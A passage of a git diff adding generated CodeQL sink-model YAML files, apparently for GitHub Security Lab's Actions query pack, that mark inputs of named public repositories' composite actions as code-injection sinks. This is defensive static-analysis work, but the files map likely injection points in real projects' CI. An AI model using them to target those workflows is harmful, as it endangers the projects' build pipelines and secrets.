@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml new file mode 100644 index 000000000000..2d3871a2231e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml new file mode 100644 index 000000000000..4f18723df389 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml new file mode 100644 index 000000000000..a96d86c7b5ca --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml new file mode 100644 index 000000000000..ff1b101be4ac --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..fb7bdd0950ee --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml new file mode 100644 index 000000000000..9b263d03357c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml new file mode 100644 index 000000000000..5e6e66c4be4e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml new file mode 100644 index 000000000000..cf545a955924 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml new file mode 100644 index 000000000000..0484e9035153 
--- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml new file mode 100644 index 000000000000..756a1a0371ad --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml new file mode 100644 index 000000000000..ed954bf6f978 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml new file mode 100644 index 000000000000..47aebb458258 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml new file mode 100644 index 000000000000..28935d7a98bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml new file mode 100644 index 000000000000..2ba9ff355e21 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml new file mode 100644 index 000000000000..530cc68ca4b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml new file mode 100644 index 000000000000..e75197656f56 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml new file mode 100644 index 000000000000..b56944cd0ff7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml new file mode 100644 index 000000000000..e6d2a79b8477 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml new file mode 100644 index 000000000000..ffd74df05e2c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml new file mode 100644 index 000000000000..f476d7160f62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml new file mode 100644 index 000000000000..e95dacb65a92 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml new file mode 100644 index 000000000000..42a9859aa230 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml new file mode 100644 index 000000000000..029e4f95a2a4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml new file mode 100644 index 000000000000..3223e185c7b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml new file mode 100644 index 000000000000..26fa1ce22b79 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml new file mode 100644 index 000000000000..a68a3372089a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml new file mode 100644 index 000000000000..6c874d646558 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml new file mode 100644 index 000000000000..8d339364cf3d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml new file mode 100644 index 000000000000..db6751f8ef5b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml new file mode 100644 index 000000000000..68959bf21024 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml new file mode 100644 index 000000000000..f8aa8480088b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml new file mode 100644 index 000000000000..0f78fddcd969 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml new file mode 100644 index 000000000000..9eb860b13d91 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml new file mode 100644 index 000000000000..573b256121f9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml new file mode 100644 index 000000000000..c5278340c0b1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml new file mode 100644 index 000000000000..b11973cfa008 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml new file mode 100644 index 000000000000..1fd3ca1f0050 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml new file mode 100644 index 000000000000..727a21ac9602 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml new file mode 100644 index 000000000000..fff6557dd410 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["web-infra-dev/rspack", "*", "inputs.post", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml new file mode 100644 index 000000000000..e87c7cf5c06b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["webassembly/wabt", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml new file mode 100644 index 000000000000..9c556053d664 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml new file mode 100644 index 000000000000..6121c00ccfd3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml new file mode 100644 index 000000000000..789bdb53aed2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml new file mode 100644 index 000000000000..58389ad753e6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml new file mode 100644 index 000000000000..853948c5ec33 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file From 83f9527cc489194e143ca2e21c724a4b10ec954d Mon Sep 17 00:00:00 2001 
